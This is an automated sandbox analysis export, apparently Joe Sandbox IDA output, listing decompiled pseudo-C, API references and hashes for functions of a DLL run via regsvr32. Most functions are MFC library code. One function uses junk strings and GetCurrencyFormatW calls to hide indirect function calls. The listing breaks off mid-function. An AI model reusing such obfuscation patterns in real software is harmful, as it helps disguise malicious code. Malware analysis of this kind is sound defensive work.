Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction ID: 8836cd366f4edbb263e832dd9095b9ce1b533ce8c5134698fb64192b8290e0ae
Opcode Fuzzy Hash: c168e17b045a5f8c37e10149647611635915d659673ffe8c7442d4f1077db2e7
Instruction Fuzzy Hash: 7C8130B5C00259AAFB51DFE4C585BDEBBF8EF043C4F118166F908E6185E7749A84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100121BA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E100121BA(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10045580; // 0x771f5646
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E10011FFD(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E10012028(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100203EC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E1001213D(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E1001213D(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1001FBB5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

APIs

GlobalLock.KERNEL32 ref: 100121E4
lstrlenA.KERNEL32(?), ref: 1001222C
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10012246

Strings

@, xrefs: 10012220

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: @
API String ID: 1529587224-2766056989
Opcode ID: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction ID: d0a0353f3703c4703b37301af5c7bc2eef77f2bc52e41b95a60fad612e9c4f7d
Opcode Fuzzy Hash: 7b64cbffffd77d6f62e722d8fcd1ccb7852461faac1414003f9851645fddc8c1
Instruction Fuzzy Hash: 0041AFB1900219EFDB15CFA4CC85AAEBBB5FF04350F148629E812EF185E774E9A5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B33 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E10013B33(void* __ebx, intOrPtr __ecx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t47;
				intOrPtr _t54;
				intOrPtr _t59;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_push(0x20);
				E1001FC2D(E10033E8D, __ebx, __edi, __esi);
				_t59 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003876c;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t59 + 0x4c)) == 0) {
						L12:
						E100124A0(_t59, _t59 + 0x24, _t75);
						E10010BA6(_t59 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10010D56(_t59, 0x1003b23c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t47 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t47 != 0) {
									 *_t47( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E1001B91E(_t59 + 0x40);
						 *(_t77 - 4) = 0;
						E10012675(_t59, _t59 + 0x24, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E100066CE(_t59);
						return E1001FCB0(_t59, _t75, _t76);
					}
					_t75 = _t59 + 0x40;
					do {
						_t76 = E1001B865(_t59, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E100132FB(_t76);
							_push(_t76);
							E10004D75(_t59, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t59 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E1000911A(_t77 - 0x24)));
						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E1001B896(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E100132FB(_t76);
									_push(_t76);
									E10004D75(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 10013B3A
GetModuleHandleA.KERNEL32(?,1003B23C,00000000), ref: 10013C05
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 10013C15

Strings

mfcm80.dll, xrefs: 10013BF4
MFCM80ReleaseManagedReferences, xrefs: 10013C0F

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction ID: effe031cbf4f857fff4e6ce51dcecab954aad45063f71112ee54279e012bf132
Opcode Fuzzy Hash: c6a1cd8c9f289d557e2193d8fdcd4d671c0258f6ce4de674d3c89b57e230dcd1
Instruction Fuzzy Hash: 8931AD75A046049FDF05DFA0C8857AE77F9EF48340F014098E905AF292EB79E985CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10014290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10014290(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E1001FC2D(E10033F1F, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038078;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E100136F0(_t91 - 0x54, 0x11) != 0 || E100136F0(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x1000ecc8
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E1000567F(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E100100ED(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E10010BA6(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x1003b2dc, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E10010141(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E10001260( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x10038068;
				E100102E5(_t91 - 0x54);
				return E1001FCB0(_t74, 0, _t90);
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 1001429A
GetObjectA.GDI32(1000ECC8,0000003C,?), ref: 100142EC
GetDeviceCaps.GDI32(?,0000005A), ref: 1001435C
OleCreateFontIndirect.OLEAUT32(00000020,1003B2DC), ref: 10014388

Strings

, xrefs: 100142F9

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction ID: 2f8d2d43e09bdf50e625724661aa14f311a958ac26713a9e64237ed0808844fe
Opcode Fuzzy Hash: 972f0215ef0ccbc12416d13741993935b9c68b8aa4feb48cc9734c8c3317cb7c
Instruction Fuzzy Hash: C7417E74E012989FDB11CFE4C941ADDFBF4EF18340F10815AE955EB2A2EBB49A84CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10006878 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E10006878(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10045580; // 0x771f5646
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10044410;
					E100209E8( &_v172, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, _t38, _t42, _t43);
					_t40 = E100105C8(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000E58E(_t40);
					}
					return E1001FC9C(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E10020F40(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1003720c;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x10048668 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x10048668 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E1001FBB5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10006890
_memset.LIBCMT ref: 100068F2
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 10006944
LoadBitmapA.USER32 ref: 1000695C

Strings

, xrefs: 100068B1

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction ID: 7502f03d00862ab63d890e742e6b2e485ad896773ebef231c484e9e01049f3a3
Opcode Fuzzy Hash: ea71f620d712e899bef3bb1e0d5e5f775c8607f1766b4d53775585144692bc44
Instruction Fuzzy Hash: 9E31C572A0025A9FFF10CFB8CDC5AAE7BA5EF48384F25452AE906EB195DA309944C750

Uniqueness

Uniqueness Score: -1.00%

Function 10002863 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10002863(intOrPtr* _a4) {
				int _v4;
				intOrPtr _v8;
				intOrPtr* _t26;
				short* _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				short* _t36;

				_t32 = L"xadqsavcbdfewescGADW";
				_t36 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v8 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9);
				_t33 =  *_a4 + 0xc0 + (_v4 + GetCurrencyFormatW(0, 0x11d4, _t36, 0, _t32, 0x22b9)) *  *0x100440dc * 8;
				if( *_t33 != 0) {
					_t35 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t36, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *_t33 + _v8 + 0xc));
					if(_t35 != 0) {
						while(1) {
							_t26 =  *_t35;
							if(_t26 == 0) {
								goto L5;
							}
							 *_t26(_v8, 1, 0);
							_t35 = _t35 + 4;
						}
					}
				}
				L5:
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002895
GetCurrencyFormatW.KERNEL32 ref: 100028A7
GetCurrencyFormatW.KERNEL32 ref: 100028D7

Strings

xadqsavcbdfewescGADW, xrefs: 1000287B, 10002880, 1000289C, 100028CE
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000286D, 10002883, 10002888, 1000289F, 100028D4

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction ID: af9e15b59c393e0d8099aaf98a9213ea7197e89f84b9fb059b6d85f6975e4071
Opcode Fuzzy Hash: 99384a53e1d54a21adb6f768068eea20c85cdecf5cf15f71da9327b643da0e1d
Instruction Fuzzy Hash: 7811BFB1604319BFE700DB55CC89F17BBECEB89754F12441AFA40EB291C771AC008B60

Uniqueness

Uniqueness Score: -1.00%

Function 10007AB6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007AB6(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E10008D3D(__ecx, __eflags, _t26) == 0) {
					_t10 = E1000B1DD(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E10009199(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E1001113D(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 10007B06

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction ID: c236510ebf9aa878e60991b13e4b4610bd432db7ec560ce308cb7ed9e00e23a0
Opcode Fuzzy Hash: eb2d6067ed4edb110068bacdbfa1c270ab431b469ec304405f5743e5f3c6169e
Instruction Fuzzy Hash: 1301AD30B00252AEFA52D6208C44F4EF7A9FF457D5F104529F54AD60BACB68E860C621

Uniqueness

Uniqueness Score: -1.00%

Function 100143C9 Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E100143C9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1001FBC4(E10033F57, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x10014589) & 0x000000ff) * 4 +  &M10014561))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E10014A76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
